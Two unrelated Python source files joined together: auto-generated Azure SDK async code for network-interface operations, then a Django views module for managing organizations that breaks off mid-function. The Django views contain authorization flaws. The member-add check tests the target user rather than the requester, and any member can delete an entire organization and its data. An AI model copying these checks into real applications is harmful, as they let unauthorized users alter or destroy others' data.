:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
async def _get_effective_route_table_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveRouteListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveRouteListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def begin_get_effective_route_table(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveRouteListResult"]:
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def _list_effective_network_security_groups_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveNetworkSecurityGroupListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveNetworkSecurityGroupListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
async def begin_list_effective_network_security_groups(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveNetworkSecurityGroupListResult"]:
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
async def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
ip_configuration_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterfaceIPConfiguration":
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
|
|
import json
from bson import ObjectId
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.views.decorators.http import require_POST, require_GET
from backend.db import db
from repos.forms import NewRepoForm
from repos.models import Repository
from .forms import NewOrganizationForm
from .models import Organization, OrganizationUser
@login_required
def organization_new( request ):
user = request.user
if request.method == 'POST':
form = NewOrganizationForm( request.POST )
if form.is_valid():
new_org = Organization( name=form.cleaned_data[ 'name' ],
gravatar=form.cleaned_data[ 'gravatar' ],
owner=user )
new_org.save()
new_org_user = OrganizationUser( user=user,
organization=new_org )
new_org_user.is_admin = True
new_org_user.pending = False
new_org_user.save()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
else:
form = NewOrganizationForm()
return render_to_response( 'organization_new.html', { 'form': form },
context_instance=RequestContext(request) )
@login_required
def organization_delete( request, org ):
user = request.user
org = get_object_or_404( Organization, name=org )
if org.has_user( user ):
# Delete any repos associated with this organization
repos = db.survey.find( { 'org': org.id } )
repos = [ repo[ '_id' ] for repo in repos ]
db.survey.remove( { '_id': { '$in': repos } } )
db.data.remove( { 'repo': { '$in': repos } } )
# Delete all the org user objects under this org
org_users = OrganizationUser.objects.filter( organization=org )
for org_user in org_users:
org_user.delete()
# Delete the main org object
org.delete()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
@login_required
def organization_dashboard( request, org ):
account = get_object_or_404( Organization, name=org )
is_owner = request.user == account.owner
is_member = OrganizationUser.objects.filter( organization=account,
user=request.user ).exists()
repos = Repository.objects.filter( org=account )
members = OrganizationUser.objects.filter( organization=account )
return render_to_response( 'organization_dashboard.html',
{ 'account': account,
'members': members,
'is_owner': is_owner,
'is_member': is_member,
'repos': repos },
context_instance=RequestContext(request) )
@login_required
def organization_repo_new( request, org ):
'''
Create a new data repository under <org>.
'''
org = get_object_or_404( Organization, name=org )
if request.method == 'POST':
form = NewRepoForm( request.POST,
request.FILES,
user=request.user,
org=org )
# Check for a valid XForm and parse the file!
if form.is_valid():
repo = form.save()
return HttpResponseRedirect( reverse( 'organization_dashboard',
kwargs={ 'org': org.name } ))
else:
form = NewRepoForm()
return render_to_response( 'new.html', { 'form': form },
context_instance=RequestContext(request) )
@login_required
@require_POST
def organization_member_add( request, org, user ):
'''
Request a user become a member of an organization.
'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
org_user = get_object_or_404( OrganizationUser,
user=request.user,
organization=org )
# Check that the current user is the owner of the org or is an admin
response = { 'success': False }
# Don't add users who are already members
res = OrganizationUser.objects.filter( organization=org,
user=user )
if len( res ) == 0:
if org.owner == user or org_user.is_admin:
org.add_user( user )
response[ 'success' ] = True
return HttpResponse( json.dumps( response ),
content_type='application/json' )
@login_required
@require_GET
def organization_member_accept( request, org, user ):
'''
Request a user become a member of an organization.
